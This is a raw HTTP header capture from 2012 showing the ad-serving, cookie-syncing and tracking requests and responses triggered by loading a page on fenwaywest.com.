udo=eJyNkE1Og1AURqEDNTFx5AIYGE1MmvCAx4Pho1AkaYHwE8OIUHgoSVsSqG1dgGPj3IEpTZpajQuxnTnqFtyEpO0CHH4n57s39z5VY1I0ZqPyG%252F9cn71c%252Fp5XZDx93Vyd0puT%252BHi91o9oit7QY3o%252B7Y%252F6z5VvqFuKkUAqAD6K5QTGKOGBCCCCvMhFEIhxIgurhywJXY4VbF%252FZUhcIItQSVNzkZRk2BQD5poxZpYlasswhpQ1YwH%252BOQ12zwpblm54TzEzrYw8cTTcscwa494NgeMHcKvv5cp%252FVLqYOqm25Hu68fe0TdjRcj1M1qjZ9HHqBrS2UIp%252BUpFjtSBt3jU6waGcFSfPpYscsd3mbDZPaYtBhg%252BHa9cl2PiGFR%252BJ7xhimeTGIRlk%252BZNzHckQGJYPdg2w5%252Bv9lU%252FMalY9v6oaYpKgXRwlLBB5AKYUcZCOIRDaOJCL1wDwvsrv6K3%252FjeZQG; expires=Mon, 18-Mar-2013 01:30:44 GMT; path=/; domain=exelator.com ud=eJxrWVyWWnRgUUnxaccrWnwT1X58WRzq6XKLQcHCMM3E0Dgx2TLFNNk8xdjQzNDU3NTYzCjR1NAsOcXSZEl%252BUWb6Ij9%252FAGE7F78%253D; expires=Mon, 18-Mar-2013 01:30:44 GMT; path=/; domain=exelator.com
Connection: close
Transfer-Encoding: chunked
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: HTTP server
GET /bh/visitormatch?tag=66901&pid=520266 HTTP/1.1

Host: bh.contextweb.com
GET /bh/visitormatch?tag=66901&amp;pid=520266 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-226-217-137
Date: Sun, 18 Nov 2012 01:30:44 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:44 GMT; Path=/ pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:44 GMT; Path=/
Content-Length: 2211
Connection: keep-alive
GET /ptj?member=514&size=300x250&referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&inv_code=1651067&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1651067%26r%3D0%26_salt%3D420036788%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26u%3Dhttp%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=514&amp;size=300x250&amp;referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;inv_code=1651067&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1651067%26r%3D0%26_salt%3D420036788%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26u%3Dhttp%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bh#s4^=K; sess=1; icu=ChII64YEEAoYASABKAEww_SghQUQw_SghQUYAA..; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:44 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:44 GMT; domain=.adnxs.com; HttpOnly icu=ChII64YEEAoYAiACKAIwxPSghQUQxPSghQUYAQ..; path=/; expires=Sat, 16-Feb-2013 01:30:44 GMT; domain=.adnxs.com; HttpOnly acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Mon, 19-Nov-2012 01:30:44 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; path=/; expires=Sat, 16-Feb-2013 01:30:44 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 417
GET /1585961/NO_b2c_A_300x250_nl_banner_131112_2012111308373038.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/90/%252a/m%253B265055682%253B0-0%253B0%253B90677916%253B4307-300/250%253B51411571/51378844/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1350046311133151043%26mt_id%3D239528%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677916%7C265055682%7C1349429%7C51411571%26WT.tsrc%3Ddisplay%26 HTTP/1.1

Host: s0.2mdn.net
GET /1585961/NO_b2c_A_300x250_nl_banner_131112_2012111308373038.swf?targetTag=_blank&amp;clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/90/%252a/m%253B265055682%253B0-0%253B0%253B90677916%253B4307-300/250%253B51411571/51378844/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1350046311133151043%26mt_id%3D239528%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677916%7C265055682%7C1349429%7C51411571%26WT.tsrc%3Ddisplay%26 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043;click=http://pixel.mathtag.com/click/img?mt_aid=1350046311133151043&amp;mt_id=239528&amp;mt_adid=100412&amp;mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&amp;redirect=
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 13 Nov 2012 07:37:32 GMT
Date: Sun, 18 Nov 2012 01:30:44 GMT
Expires: Mon, 19 Nov 2012 01:30:44 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 12508
X-XSS-Protection: 1; mode=block
GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1

Host: pcm1.map.pulsemgr.com
GET /uds/pc?ptnr=21272&amp;sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: Apache-Coyote/1.1
Content-Length: 43
Connection: keep-alive
GET /dmm/contextweb/match HTTP/1.1

Host: contextweb-match.dotomi.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 204 No Content

Content-Type: text/plain
Date: Sun, 18 Nov 2012 01:30:44 GMT
X-Name: dtiad01rtb01p.int
Cache-Control: max-age=0, no-store
Content-Length: 0
Connection: close
GET /GetWidget.aspx?id=924de7ea-1917-4b16-af38-f7a0a4352145&d=ZmVud2F5d2VzdC5jb20=&wid=1868&title=http%253A//www.fenwaywest.com/index.php%253Foption%253Dcom_content%2526amp%253Bview%253Darticle%2526amp%253Bid%253D7%2526amp%253BItemid%253D101&url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: api.content.ad
GET /GetWidget.aspx?id=924de7ea-1917-4b16-af38-f7a0a4352145&amp;d=ZmVud2F5d2VzdC5jb20=&amp;wid=1868&amp;title=http%253A//www.fenwaywest.com/index.php%253Foption%253Dcom_content%2526amp%253Bview%253Darticle%2526amp%253Bid%253D7%2526amp%253BItemid%253D101&amp;url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nbbeqxqweaiamlkgma2i5smc; path=/; HttpOnly urlHistory=387876:1,388817:1,109485:1,12084:1; expires=Mon, 19-Nov-2012 13:29:29 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:29 GMT
Content-Length: 13407
GET /imp?anmember=514&anprice=100&Z=300x250&s=1651067&r=0&_salt=420036788&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=100&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: testbounce=testing
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0547.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=15trast3s/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=100&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:44 GMT
Expires: Sun, 18 Nov 2012 01:30:44 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /010921/feed.xml?0.0322984587401152 HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 2267
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /activity?_o=62795&_t=cm_cntxtweb HTTP/1.1

Host: m.xp1.ru4.com
GET /activity?_o=62795&amp;_t=cm_cntxtweb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 18 Nov 2012 01:30:43 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NON DSP COR PSAa OUR STP UNI&quot;
Pragma: no-cache
Set-Cookie: X1ID=NE-00000002579495986; domain=.ru4.com; path=/; expires=Sat, 17-May-2014 20:30:43 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=531292&amp;ev=NE-00000002579495986&amp;rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DNE-00000002579495986
Content-Length: 0
GET /010921/300x250_christmas2.jpg HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 28210
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /bh/rtset?do=add&pid=531292&ev=NE-00000002579495986&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DNE-00000002579495986 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=531292&amp;ev=NE-00000002579495986&amp;rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DNE-00000002579495986 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-226-217-137
Date: Sun, 18 Nov 2012 01:30:44 GMT
Expires: -1
Location: http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=NE-00000002579495986
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:45 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:45 GMT; Path=/
Content-Length: 239
Connection: keep-alive
GET /orbserv/hbpix?pixId=5392 HTTP/1.1

Host: idpix.media6degrees.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Dec 2008 21:07:52 GMT
Etag: &quot;1d60111-2b-45e305a397a00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /v2/cexposer/SIG=15trast3s/*http%3A//ad.yieldmanager.com/imp?anmember=514&anprice=100&Z=300x250&s=1651067&r=0&_salt=420036788&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=15trast3s/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=100&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:45 GMT
Set-Cookie: B=2geu5h18agei5&amp;b=3&amp;s=ct; expires=Tue, 19-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?anmember=514&amp;anprice=100&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php&amp;SIG=10v5rpf70;x-cookie=2trh5u18ntrv5&amp;o=3&amp;f=pg
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /v2/cexposer/SIG=1b6lchm45/*http%3A//ad.yieldmanager.com/imp?anmember=514&anprice=50&Z=160x600&s=653070&r=0&_salt=1916686269&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&B=1 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=1b6lchm45/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:45 GMT
Set-Cookie: B=edelvjl8agei5&amp;b=3&amp;s=o4; expires=Tue, 19-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1&amp;SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&amp;o=3&amp;f=b4
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=NE-00000002579495986 HTTP/1.1

Host: m.xp1.ru4.com
